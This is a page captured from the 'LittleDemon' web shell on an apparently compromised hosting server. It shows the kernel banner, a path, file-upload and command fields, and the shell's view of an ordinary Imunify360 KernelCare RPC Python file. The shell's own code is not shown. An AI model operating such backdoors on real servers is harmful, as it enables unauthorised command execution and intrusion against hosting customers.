LittleDemon WebShell


Linux server27.hostingraja.org 2.6.32-954.3.5.lve1.4.93.el6.x86_64 #1 SMP Wed Oct 4 17:04:29 UTC 2023 x86_64
Path : /opt/imunify360/venv/lib64/python3.11/site-packages/im360/simple_rpc/
File Upload :
Command :
Current File : //opt/imunify360/venv/lib64/python3.11/site-packages/im360/simple_rpc/kcarectl.py

"""Endpoints for the `kcarectl` command."""
from defence360agent.rpc_tools import lookup
from defence360agent.utils import Scope
from im360.subsys.features import kernel_care

__all__ = ["KernelCareEndpoints"]


class KernelCareEndpoints(lookup.RootEndpoints):
    SCOPE = Scope.IM360

    @lookup.bind("kcarectl", "plugin-info")
    async def plugin_info(self):
        return dict(items=await kernel_care.KernelCare().get_plugin_info())

    @lookup.bind("kcarectl", "disable-auto-update")
    async def disable_auto_update(self):
        await kernel_care.KernelCare().run_kcarectl("--disable-auto-update")
        return {}

    @lookup.bind("kcarectl", "enable-auto-update")
    async def enable_auto_update(self):
        await kernel_care.KernelCare().run_kcarectl("--enable-auto-update")
        return {}

LittleDemon - FACEBOOK
[ KELUAR ]